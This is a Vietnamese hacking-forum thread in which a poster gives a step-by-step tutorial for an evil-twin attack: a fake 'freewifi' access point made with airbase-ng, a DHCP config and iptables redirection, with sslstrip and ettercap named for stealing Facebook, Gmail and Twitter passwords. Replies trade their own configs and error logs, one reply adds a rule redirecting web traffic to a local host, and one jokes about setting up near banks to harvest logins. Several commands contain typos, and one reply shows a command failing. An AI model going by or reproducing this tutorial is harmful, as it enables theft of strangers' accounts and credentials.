Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỷ

[Hackerstudent93]

Hôm nay mình sẽ hướng dẫn các Hack facbook , gmail, yahoo, twitter bằng cách Bằng cách Create a fake, malicious Wireless Network using Kali.

​

Ý tưởng thế này: chúng ta sẽ phát ra một mạng wifi giả mạo với tên là " wifi free " rồi cho người dùng tha hồ mà truy cập vào dùng miễn phí, sau đó chúng ta sẽ đánh cắp user và password của họ bằng cách sử dụng tool SSlstrip và Ettercap trong kali

Bên dưới là tất cả các lệnh mà các bạn sẽ sử dụng

- Nhận default bằng cách sử dụng lệnh
route -n

- Cài đặt DHCP3 Server bằng cách sử dụng lệnh
sudo apt-get install dhcp3-server

- Nào bây giờ chúng ta sẽ edit file cấu hình DHCP như sau
vi /etc/dhcpd.conf
Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0 {
Option routers 192.168.1.1;
Option subnet-mask 255.255.255.0;
Option domain-name “freewifi”;
Option domain-name-servers 192.168.1.1;
Range 192.168.1.2 192.168.1.40;
}

sau đó thì lưa lại

- Tiếp theo gõ
airmon-ng

Start monitor mode bằng cách sử dụng lệnh
airmong-ng start wlan0

- Tạo một fake access point bằng cách sử dụng lệnh
airbase-ng -c 11 -e freewifi mon0

- Và bây giờ thì nhập tất cả các lệnh sau cho thật chính xác và cẩn thận
Ifconfig at0 192.168.1.1 netmask 255.255.255.0
Ifconfig at0 mtu 1400
Route add –net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Echo 1 > /proc/sys/net/ipv4/ip_forward
Iptables –t nat –A PREROUTNG –p udp –j DNAT –to 192.168.0.1

 

Re: ( Hack facebook, Gmail, twitter ...) Bằng cách Create a fake, malicious Wireless Network using

Anh em nào nếu chưa thực hiện được thành công, thì coment ở dưới, mình sẽ giải đáp và hỗ trợ các bạn nếu có thời gian

 

Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

Tất cả chạy đều ok nhưng không thể connect d.c vào cái fake AP bác có gặp trường hợp đó help e với
p/s : e dùng kali trên máy ảo , sử dụng usb wifi
Dùng thử linset thì nó báo lỗi thế này

Configuration file: /tmp/TMPlinset/hostapd.conf
Failed to update rate sets in kernel module
Using interface wlan0 with hwaddr xx:xx:3b:f1:f5:0c and ssid 'xxx'
wlan0: STA 60:6c:66:17:45:94 IEEE 802.11: did not acknowledge authentication response

wlan0: STA 60:6c:66:17:45:94 IEEE 802.11: did not acknowledge authentication response
wlan0: STA 90:18:7c:a6:41:da IEEE 802.11: did not acknowledge authentication response
wlan0: STA 90:18:7c:a6:41:da IEEE 802.11: disassociated
wlan0: STA 90:18:7c:a6:41:da IEEE 802.11: deauthenticated due to inactivity

 

Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

Tất cả chạy đều ok nhưng không thể connect d.c vào cái fake AP bác có gặp trường hợp đó help e với
p/s : e dùng kali trên máy ảo , sử dụng usb wifi
Dùng thử linset thì nó báo lỗi thế này

Configuration file: /tmp/TMPlinset/hostapd.conf
Failed to update rate sets in kernel module
Using interface wlan0 with hwaddr xx:xx:3b:f1:f5:0c and ssid 'xxx'
wlan0: STA 60:6c:66:17:45:94 IEEE 802.11: did not acknowledge authentication response

wlan0: STA 60:6c:66:17:45:94 IEEE 802.11: did not acknowledge authentication response
wlan0: STA 90:18:7c:a6:41:da IEEE 802.11: did not acknowledge authentication response
wlan0: STA 90:18:7c:a6:41:da IEEE 802.11: disassociated
wlan0: STA 90:18:7c:a6:41:da IEEE 802.11: deauthenticated due to inactivity

chụp ảnh màn hình của bạn cho tôi, rồi các đoạn code mà bạn gõ nữa để tỗi xem, chứ copy mỗi cái lỗi lên thế này thì xử lý thế nào được ?

 

Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

etc/dhcpd.conf

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 10.0.1.255;
option routers 10.0.1.129;
option domain-name-servers 8.8.8.8;
range 10.0.1.130 10.0.1.140;
}

ifconfig at0 10.0.1.129 netmask 255.255.255.128
route add -net 10.0.1.128 netmask 255.255.255.128 gw 10.0.1.129
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.8:80
iptables -t nat -A POSTROUTING -j MASQUERADE
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start

 

Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

Còn thằng Linset thì báo như vầy :

 

Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

Còn thằng Linset thì báo như vầy :

View attachment 2544

đã xem qua file cấu hình và chụp ảnh màn hình của bạn, bạn cấu hình cũng như dùng tool khác của mình đề cập ở trong bài viết, các câu lệnh cũng khác, bạn đã tìm hiểu kỹ về Linset chưa? khuyên bạn dùng thử cách của mình. đoạn code ở dưới mình đã chạy ngon lành rồi bạn thử cấu hình tất cả mọi thứ rồi dùng tool ettercap và sslstrip trong kali xem thế nào, còn vấn đề của bạn mình không giúp được

vi /etc/dhcpd.conf
Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.2.0 netmask 255.255.255.0 {
Option routers 192.168.2.1;
Option subnet-mask 255.255.255.0;
Option domain-name “freewifi”;
Option domain-name-servers 192.168.2.1;
Range 192.168.2.2 192.168.2.40;
}
airmon-ng
airmon-ng start wlan0
kill pid
airbase-ng -c 11 -e freewifi mon0
ifconfig at0 192.168.2.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add –net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –t nat –A PREROUTNG –p udp –j DNAT –-to 192.168.1.1

 

Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

=.= ko biết bác test thế nào chứ mình ko nghĩ nó chạy đ.c =.=

Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.2.0 netmask 255.255.255.0 {
Option routers 192.168.2.1;
Option subnet-mask 255.255.255.0;
Option domain-name “freewifi”;
Option domain-name-servers 192.168.2.1;
Range 192.168.2.2 192.168.2.40;
}

route add –net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1

–net: Unknown host

 

Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

=.= ko biết bác test thế nào chứ mình ko nghĩ nó chạy đ.c =.=

vớ vẩn nào, cho một trận bây giờ, gõ bằng tay tất cả dòng lệnh một cách thật là chính xác và cẩn thận, nghiêm cấm mọi hành động
copy và dán , nhìn hình ảnh tôi chụp demo ở trên xem có chay không mà dám bảo là không chạy

 

Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

cái video demo hướng hẫn nguy hiểm quá bị youtube nó xóa rồi, mọi người tự làm theo hướng dẫn ở trên nhé

 

Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

Mở quán cafe wifi cạnh cơ quan, ngân hàng...

 

Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

Mở quán cafe wifi cạnh cơ quan, ngân hàng...

Mở rùi cho mình cái địa chỉ, keke

 

Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

Mở quán cafe wifi cạnh cơ quan, ngân hàng...

Cho mình uống cafe miễn phí của quán bạn được không ạ

 

Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

Ko dùng VMware mà dùng VirtualBox mạng ở Bridge Mode được ko? :">

 

Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

Ko dùng VMware mà dùng VirtualBox mạng ở Bridge Mode được ko? :">

Ngon lành nhé